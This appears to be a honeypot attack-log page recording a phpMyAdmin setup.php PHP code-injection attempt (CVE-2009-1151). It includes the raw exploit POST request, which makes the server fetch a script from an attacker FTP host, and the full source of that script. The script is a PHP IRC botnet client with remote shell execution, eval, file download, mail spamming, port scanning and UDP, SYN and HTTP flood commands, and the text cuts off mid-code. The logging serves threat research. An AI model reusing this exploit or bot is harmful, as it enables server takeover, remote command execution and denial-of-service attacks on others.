Help on available search operators
Operators
tag: filter by relevant keywords (e.g., shellshock)
port: filter by destination port
attacker: filter by attacker IP address
country: filter by attacker country (2 letters)
since: filter since provided date (dd/mm/yyyy format)
plugin: filter by plugin ID
resource: filter requests with a resource with the given MD5
Hints
The minus operator - can be used to exclude the results containing a given keyword.
You can combine different operators, or provide multiple values for each one using comma as separator.
e.g., port:80,8080
e.g., port:80 -scripts/setup.php
e.g., upload?org.apache.catalina.filters port:8080
1-10 of 6213963 results (621397 pages)
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
95.110.227.41
Dest. port: 80
Time: 05/10/2019 22:05:43
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host41-227-110-95.serverdedicati.aruba.it
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 234
cookie2: $Version="1"
Host: 35.45.135.26
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://35.45.135.26/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=2e43e013731e676c3502e227ca71d7da
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=a74bbbb1ba8ffc7009b69e36bcfd6dd6&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22ftp%3A%2F%2F95%2E110%2E227%2E41%2Fbot%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 91e62db93324cf2680b117e568cf6df0
Type: text/x-php
Size: 41796
URL: ftp://95.110.227.41/bot.php
<?php
set_time_limit(0);
error_reporting(0);
echo "ok!";
class pBot
{
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36",
"Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36",
"Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.3",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
"Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0",
"Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0",
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)",
"Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
"Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00",
"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
"Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
"Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
);
var $config = array("server"=>"91.134.216.27",
"port"=>"6667",
"pass"=>"",
"prefix"=>"",
"maxrand"=>"7",
"chan"=>"#MiasmaSecurityTeam",
"chan2"=>"#MiasmaSecurityTeam",
"key"=>"",
"modes"=>"+ps",
"password"=>"MiasmaSec",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost takapusi.cok)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan2'],"#-> \2Denzo Bot Status : Online and connected \2 <-# ");
$this->privmsg($this->config['chan2'],"#-> \2Denzo BOTNET By DenzelHax 2019\2 <-# ");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->privmsg($this->config['chan'],"[\2Auth\2]: welcome $nick we missed you.");
$this->log_in($host);
}
else
{
$this->privmsg($this->config['chan'],"[\2Auth\2]: Wrong password $nick please check your line 49 in uploaded phpbot");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "safe":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else {
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@jatimcom.cok>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#[email protected] since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <[email protected]>",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "conback":
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "botvuln":
case "vuln":
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[\2bot\2]: #-> phpbot of Denzo BOTNET coded by Denzel <-#");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "passthru":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "popen":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
case "system":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // -pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "die":
$this->send("QUIT : $nick Closed connection");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick Ndang Cewok Lek Wes Mari!!!!");
break;
case "jsbypassflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: jsbypassflood host port time [method] [url] [postFields]");
}
break;
case "masshttpv2":
if(count($mcmd)>2)
{
$this->HTTP_Flood($mcmd[1],$mcmd[2],$mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: masshttpv2 host page length");
}
break;
case "massudpflood":
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: massudpflood host packet time");
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "massudp":
if (count($mcmd) > 4) {
$this->udpfloodv2($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: massudp host port time packetsize");
}
break;
case "masshttp":
if (count($mcmd) > 2) {
